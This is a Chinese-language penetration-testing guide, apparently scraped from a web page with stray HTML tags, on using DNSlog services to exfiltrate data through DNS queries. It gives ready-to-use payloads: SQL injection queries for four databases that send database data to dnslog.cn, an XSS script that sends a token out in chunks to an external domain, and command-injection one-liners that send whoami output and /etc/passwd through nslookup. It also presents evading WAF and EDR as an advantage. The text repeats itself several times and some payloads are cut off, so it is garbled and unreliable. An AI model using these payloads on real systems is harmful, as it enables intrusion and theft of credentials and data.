DNSlog在漏洞挖掘中的高级应用指南<\/h1>

1. DNS基础概念<\/h2>

1.1 DNS定义与作用<\/h3>
DNS(Domain Name System)是互联网的核心基础设施，主要功能是将域名(如www.example.com)转换为IP地址(如1.1.1.1)。它充当"翻译官"角色，让用户通过易记的域名访问网络资源。<\/p>

1.2 DNS协议特性<\/h3>

正向解析<\/strong>：域名 → IP地址(最常见)<\/li>

反向解析<\/strong>：IP地址 → 域名(常用于日志分析、邮件验证等)<\/li> <\/ul>
1.3 DNS解析流程<\/h3>

本地解析<\/strong>：

检查本地DNS缓存<\/li>
查阅hosts文件(C:\Windows\System32\drivers\etc\hosts)<\/li> <\/ul> <\/li>
DNS服务器解析<\/strong>：

查询配置的DNS服务器(如8.8.8.8)<\/li>
采用分层解析机制(根→TLD→权威DNS)<\/li> <\/ul> <\/li> <\/ol>
1.4 DNS服务器层级<\/h3>

根DNS服务器<\/strong>：

全球仅13组(命名为A到M)<\/li>
不直接解析域名，但知道TLD服务器的位置<\/li> <\/ul> <\/li>
TLD服务器<\/strong>：

管理特定后缀域名(如.com、.net、.cn)<\/li>
告知权威DNS服务器的位置<\/li> <\/ul> <\/li>
权威DNS服务器<\/strong>：

由域名拥有者设置<\/li>
提供域名解析的最终答案<\/li> <\/ul> <\/li>
本地DNS服务器<\/strong>：

如8.8.8.8或114.114.114.114<\/li>
递归查询并将结果返回给用户<\/li> <\/ul> <\/li> <\/ol>
2. DNSlog原理与优势<\/h2>
2.1 DNSlog定义<\/h3>
DNSlog平台是一个权威DNS服务器+日志记录系统<\/strong>，负责特定域名的解析并记录所有对该域名的DNS请求。<\/p>
2.2 工作原理<\/h3>

用户生成随机子域名(如1.CMCCAdmin.eyes.sh<\/code>)<\/li>
递归DNS发起迭代查询(根→TLD→权威DNS)<\/li>
DNSlog平台捕获请求并记录子域名<\/li> <\/ol> 2.3 关键优势<\/h3> 绕过HTTP限制<\/strong>：DNS解析发生在HTTP请求之前，即使HTTP被阻断，DNS请求仍可能成功<\/li> 隐蔽性强<\/strong>：不易被WAF、EDR等安全设备检测<\/li> 无回显场景适用<\/strong>：适用于盲注、盲RCE等无回显漏洞<\/li> <\/ul> 3. DNSlog在漏洞挖掘中的应用<\/h2> 3.1 适用场景<\/h3> 目标存在漏洞但无回显(盲注、盲RCE、XXE等)<\/li> 目标禁用HTTP通信\/外带(CSP限制、XSS被sandbox等)<\/li> 需要绕过日志审计、WAF、EDR<\/li> <\/ol> 3.2 SQL注入数据外带<\/h3> 3.2.1 多线程环境下的优势<\/h4> 当目标采用多线程异步处理时，传统时间盲注可能失效，DNSlog成为有效解决方案。<\/p> 3.2.2 各数据库Payload示例<\/h4> 数据库<\/th> 利用前提<\/th> POC(验证外带)<\/th> 数据外带Payload示例<\/th> <\/tr> <\/thead> MySQL<\/td> 1. Windows系统2. LOAD_FILE()可用(需secure_file_priv=''且有FILE权限)<\/td> SELECT LOAD_FILE('\\\\test.dnslog.cn\\abc');<\/code><\/td> SELECT LOAD_FILE(CONCAT('\\\\',HEX(@@version),'.dnslog.cn\\x'));<\/code><\/td> <\/tr> MSSQL<\/td> 1. SA权限2. 启用xp_dirtree存储过程<\/td> DECLARE @h VARCHAR(50)='\\\\test.dnslog.cn\\abc';<\/code>EXEC master..xp_dirtree @h;<\/code><\/td> DECLARE @h='\\\\'+master.dbo.fn_varbintohexstr(CONVERT(VARBINARY(30),DB_NAME()))+'.dnslog.cn\\x';<\/code>EXEC xp_dirtree @h;<\/code><\/td> <\/tr> Oracle<\/td> 1. 网络ACL权限2. 启用UTL_INADDR或UTL_HTTP<\/td> SELECT UTL_INADDR.get_host_address('test.dnslog.cn') FROM dual;<\/code><\/td> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT RAWTOHEX(SYS_CONTEXT('USERENV','CURRENT_USER'))<\/code><\/td> <\/tr> PostgreSQL<\/td> 1. 超级用户权限2. 启用COPY TO PROGRAM(默认禁用)<\/td> COPY (SELECT 'test') TO PROGRAM 'ping test.dnslog.cn';<\/code><\/td> COPY (SELECT '') TO PROGRAM 'nslookup '<\/code><\/td> <\/tr> <\/tbody> <\/table> 3.3 XSS数据外带<\/h3> 当目标站点禁止HTTP外带时，DNSlog成为XSS数据外带的有效方式。<\/p> 3.3.1 示例Payload<\/h4> <svg<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> const<\/span> token<\/span> =<\/span> xxxx<\/span>; \/\/替换为要外带的字段 <\/span><\/span><\/span><\/span> const<\/span> encodedToken<\/span> =<\/span> encodeURIComponent(token<\/span>); <\/span><\/span> const<\/span> domain<\/span> =<\/span> 'xxx.eyes.sh'<\/span>; \/\/dnslog地址要换自己的 <\/span><\/span><\/span><\/span> const<\/span> maxChunkSize<\/span> =<\/span> 60<\/span>; <\/span><\/span> <\/span><\/span> for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> encodedToken<\/span>.length<\/span>; i<\/span> +=<\/span> maxChunkSize<\/span>) { <\/span><\/span> const<\/span> chunk<\/span> =<\/span> encodedToken<\/span>.substring<\/span>(i<\/span>, i<\/span> +<\/span> maxChunkSize<\/span>); <\/span><\/span> const<\/span> url<\/span> =<\/span> `http:\/\/<\/span>${<\/span>i<\/span>}<\/span>-<\/span>${<\/span>chunk<\/span>}<\/span>.<\/span>${<\/span>domain<\/span>}<\/span>`<\/span>; <\/span><\/span> new<\/span> Image<\/span>().src<\/span> =<\/span> url<\/span>; <\/span><\/span> } <\/span><\/span><\/script<\/span>> <\/span><\/span><\/svg<\/span>> <\/span><\/span><\/code><\/pre>3.4 RCE命令回显外带<\/h3> 3.4.1 基础命令<\/h4> ping `whoami`.CMCCAdmin.eyes.sh host $(whoami).CMCCAdmin.eyes.sh nslookup $(whoami).CMCCAdmin.eyes.sh <\/code><\/pre> 3.4.2 编码传输<\/h4> host $(id | base64).CMCCAdmin.eyes.sh host $(whoami | xxd -p -c 256).CMCCAdmin.eyes.sh nslookup $(whoami | xxd -p -c 256).CMCCAdmin.eyes.sh <\/code><\/pre> 3.4.3 分块传输示例<\/h4> cat \/etc\/passwd | while read line; do echo -n "$line" | xxd -p -c30 | while read hex_chunk; do nslookup "${hex_chunk}.CMCCAdmin.eyes.sh" done done <\/code><\/pre> 4. DNSlog的局限性及解决方案<\/h2> 4.1 主要限制<\/h3> 标签长度限制<\/strong>：每个标签(点与点之间的部分)不超过63个字符<\/li> 总长度限制<\/strong>：完整域名(FQDN)不超过255个字符<\/li> <\/ol> 4.2 解决方案：分块传输<\/h3> 对于大数据传输，可采用分块策略：<\/p> 将数据分割为多个小段<\/li> 每段单独传输<\/li> 接收端重组数据<\/li> <\/ol> 4.3 编码建议<\/h3> 对于特殊字符(#、@、'、"等)，应采用编码传输：<\/p> 十六进制编码(HEX)<\/li> Base64编码<\/li> URL编码<\/li> <\/ul> 5. 实战技巧<\/h2> 5.1 数据外带基本流程<\/h3> 获取可控的代码执行环境(XSS、命令注入等)<\/li> 读取敏感变量(cookie、token、凭据等)<\/li> 将数据拼接到DNSlog域名的子域中<\/li> 触发解析实现数据外带<\/li> <\/ol> 5.2 分块传输实现(MySQL示例)<\/h3> 对于大数据查询(如select session from test where id=1<\/code>)，使用concat、substring等函数实现分块传输。<\/p> 6. 总结<\/h2> DNSlog作为一种强大的数据外带技术，在多种漏洞挖掘场景中展现出独特优势。掌握其原理和应用方法，能够帮助安全研究人员在受限环境下有效验证和利用漏洞。随着安全防御措施的不断加强，DNSlog技术也将持续演进，成为渗透测试和漏洞挖掘中不可或缺的工具之一。<\/p>

DNSlog在漏洞挖掘中的高级应用指南<\/h1>

1. DNS基础概念<\/h2>

1.1 DNS定义与作用<\/h3>
DNS(Domain Name System)是互联网的核心基础设施，主要功能是将域名(如www.example.com)转换为IP地址(如1.1.1.1)。它充当"翻译官"角色，让用户通过易记的域名访问网络资源。<\/p>

2. DNSlog原理与优势<\/h2>

2.1 DNSlog定义<\/h3>
DNSlog平台是一个权威DNS服务器+日志记录系统<\/strong>，负责特定域名的解析并记录所有对该域名的DNS请求。<\/p>

3. DNSlog在漏洞挖掘中的应用<\/h2>

3.2 SQL注入数据外带<\/h3>

3.2.1 多线程环境下的优势<\/h4>
当目标采用多线程异步处理时，传统时间盲注可能失效，DNSlog成为有效解决方案。<\/p>

3.3 XSS数据外带<\/h3>
当目标站点禁止HTTP外带时，DNSlog成为XSS数据外带的有效方式。<\/p>

3.4 RCE命令回显外带<\/h3>

4. DNSlog的局限性及解决方案<\/h2>

5. 实战技巧<\/h2>

5.2 分块传输实现(MySQL示例)<\/h3>
对于大数据查询(如`select session from test where id=1<\/code>)，使用concat、substring等函数实现分块传输。<\/p>`

数据库<\/th>	利用前提<\/th>	POC(验证外带)<\/th>	数据外带Payload示例<\/th> <\/tr> <\/thead>
MySQL<\/td>	1. Windows系统2. LOAD_FILE()可用(需secure_file_priv=''且有FILE权限)<\/td>	`SELECT LOAD_FILE('\\\\test.dnslog.cn\\abc');<\/code><\/td>`	`SELECT LOAD_FILE(CONCAT('\\\\',HEX(@@version),'.dnslog.cn\\x'));<\/code><\/td> <\/tr>`
MSSQL<\/td>	1. SA权限2. 启用xp_dirtree存储过程<\/td>	`DECLARE @h VARCHAR(50)='\\\\test.dnslog.cn\\abc';<\/code>EXEC master..xp_dirtree @h;<\/code><\/td>`	`DECLARE @h='\\\\'+master.dbo.fn_varbintohexstr(CONVERT(VARBINARY(30),DB_NAME()))+'.dnslog.cn\\x';<\/code>EXEC xp_dirtree @h;<\/code><\/td> <\/tr>`
Oracle<\/td>	1. 网络ACL权限2. 启用UTL_INADDR或UTL_HTTP<\/td>	`SELECT UTL_INADDR.get_host_address('test.dnslog.cn') FROM dual;<\/code><\/td>`	`SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT RAWTOHEX(SYS_CONTEXT('USERENV','CURRENT_USER'))<\/code><\/td> <\/tr>`
PostgreSQL<\/td>	1. 超级用户权限2. 启用COPY TO PROGRAM(默认禁用)<\/td>	`COPY (SELECT 'test') TO PROGRAM 'ping test.dnslog.cn';<\/code><\/td>`	COPY (SELECT '') TO PROGRAM 'nslookup '<\/code><\/td> <\/tr> <\/tbody> <\/table> 3.3 XSS数据外带<\/h3> 当目标站点禁止HTTP外带时，DNSlog成为XSS数据外带的有效方式。<\/p> 3.3.1 示例Payload<\/h4> <svg<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> const<\/span> token<\/span> =<\/span> xxxx<\/span>; \/\/替换为要外带的字段 <\/span><\/span><\/span><\/span> const<\/span> encodedToken<\/span> =<\/span> encodeURIComponent(token<\/span>); <\/span><\/span> const<\/span> domain<\/span> =<\/span> 'xxx.eyes.sh'<\/span>; \/\/dnslog地址要换自己的 <\/span><\/span><\/span><\/span> const<\/span> maxChunkSize<\/span> =<\/span> 60<\/span>; <\/span><\/span> <\/span><\/span> for<\/span> (let<\/span> i<\/span> =<\/span> 0<\/span>; i<\/span> <<\/span> encodedToken<\/span>.length<\/span>; i<\/span> +=<\/span> maxChunkSize<\/span>) { <\/span><\/span> const<\/span> chunk<\/span> =<\/span> encodedToken<\/span>.substring<\/span>(i<\/span>, i<\/span> +<\/span> maxChunkSize<\/span>); <\/span><\/span> const<\/span> url<\/span> =<\/span> `http:\/\/<\/span>${<\/span>i<\/span>}<\/span>-<\/span>${<\/span>chunk<\/span>}<\/span>.<\/span>${<\/span>domain<\/span>}<\/span>`<\/span>; <\/span><\/span> new<\/span> Image<\/span>().src<\/span> =<\/span> url<\/span>; <\/span><\/span> } <\/span><\/span><\/script<\/span>> <\/span><\/span><\/svg<\/span>> <\/span><\/span><\/code><\/pre>3.4 RCE命令回显外带<\/h3> 3.4.1 基础命令<\/h4> ping `whoami`.CMCCAdmin.eyes.sh host $(whoami).CMCCAdmin.eyes.sh nslookup $(whoami).CMCCAdmin.eyes.sh <\/code><\/pre> 3.4.2 编码传输<\/h4> host $(id \| base64).CMCCAdmin.eyes.sh host $(whoami \| xxd -p -c 256).CMCCAdmin.eyes.sh nslookup $(whoami \| xxd -p -c 256).CMCCAdmin.eyes.sh <\/code><\/pre> 3.4.3 分块传输示例<\/h4> cat \/etc\/passwd \| while read line; do echo -n "$line" \| xxd -p -c30 \| while read hex_chunk; do nslookup "${hex_chunk}.CMCCAdmin.eyes.sh" done done <\/code><\/pre> 4. DNSlog的局限性及解决方案<\/h2> 4.1 主要限制<\/h3> 标签长度限制<\/strong>：每个标签(点与点之间的部分)不超过63个字符<\/li> 总长度限制<\/strong>：完整域名(FQDN)不超过255个字符<\/li> <\/ol> 4.2 解决方案：分块传输<\/h3> 对于大数据传输，可采用分块策略：<\/p> 将数据分割为多个小段<\/li> 每段单独传输<\/li> 接收端重组数据<\/li> <\/ol> 4.3 编码建议<\/h3> 对于特殊字符(#、@、'、"等)，应采用编码传输：<\/p> 十六进制编码(HEX)<\/li> Base64编码<\/li> URL编码<\/li> <\/ul> 5. 实战技巧<\/h2> 5.1 数据外带基本流程<\/h3> 获取可控的代码执行环境(XSS、命令注入等)<\/li> 读取敏感变量(cookie、token、凭据等)<\/li> 将数据拼接到DNSlog域名的子域中<\/li> 触发解析实现数据外带<\/li> <\/ol> 5.2 分块传输实现(MySQL示例)<\/h3> 对于大数据查询(如select session from test where id=1<\/code>)，使用concat、substring等函数实现分块传输。<\/p> 6. 总结<\/h2> DNSlog作为一种强大的数据外带技术，在多种漏洞挖掘场景中展现出独特优势。掌握其原理和应用方法，能够帮助安全研究人员在受限环境下有效验证和利用漏洞。随着安全防御措施的不断加强，DNSlog技术也将持续演进，成为渗透测试和漏洞挖掘中不可或缺的工具之一。<\/p>

DNSlog在漏洞挖掘中的高级应用指南<\/h1>

1. DNS基础概念<\/h2>

1.1 DNS定义与作用<\/h3> DNS(Domain Name System)是互联网的核心基础设施，主要功能是将域名(如www.example.com)转换为IP地址(如1.1.1.1)。它充当"翻译官"角色，让用户通过易记的域名访问网络资源。<\/p>

2. DNSlog原理与优势<\/h2>

2.1 DNSlog定义<\/h3> DNSlog平台是一个权威DNS服务器+日志记录系统<\/strong>，负责特定域名的解析并记录所有对该域名的DNS请求。<\/p>

3. DNSlog在漏洞挖掘中的应用<\/h2>

3.2 SQL注入数据外带<\/h3>

3.2.1 多线程环境下的优势<\/h4> 当目标采用多线程异步处理时，传统时间盲注可能失效，DNSlog成为有效解决方案。<\/p>

3.3 XSS数据外带<\/h3> 当目标站点禁止HTTP外带时，DNSlog成为XSS数据外带的有效方式。<\/p>

3.4 RCE命令回显外带<\/h3>

4. DNSlog的局限性及解决方案<\/h2>

5. 实战技巧<\/h2>

5.2 分块传输实现(MySQL示例)<\/h3> 对于大数据查询(如select session from test where id=1<\/code>)，使用concat、substring等函数实现分块传输。<\/p>

1.1 DNS定义与作用<\/h3>
DNS(Domain Name System)是互联网的核心基础设施，主要功能是将域名(如www.example.com)转换为IP地址(如1.1.1.1)。它充当"翻译官"角色，让用户通过易记的域名访问网络资源。<\/p>

2.1 DNSlog定义<\/h3>
DNSlog平台是一个权威DNS服务器+日志记录系统<\/strong>，负责特定域名的解析并记录所有对该域名的DNS请求。<\/p>

3.2.1 多线程环境下的优势<\/h4>
当目标采用多线程异步处理时，传统时间盲注可能失效，DNSlog成为有效解决方案。<\/p>

3.3 XSS数据外带<\/h3>
当目标站点禁止HTTP外带时，DNSlog成为XSS数据外带的有效方式。<\/p>

5.2 分块传输实现(MySQL示例)<\/h3>
对于大数据查询(如`select session from test where id=1<\/code>)，使用concat、substring等函数实现分块传输。<\/p>`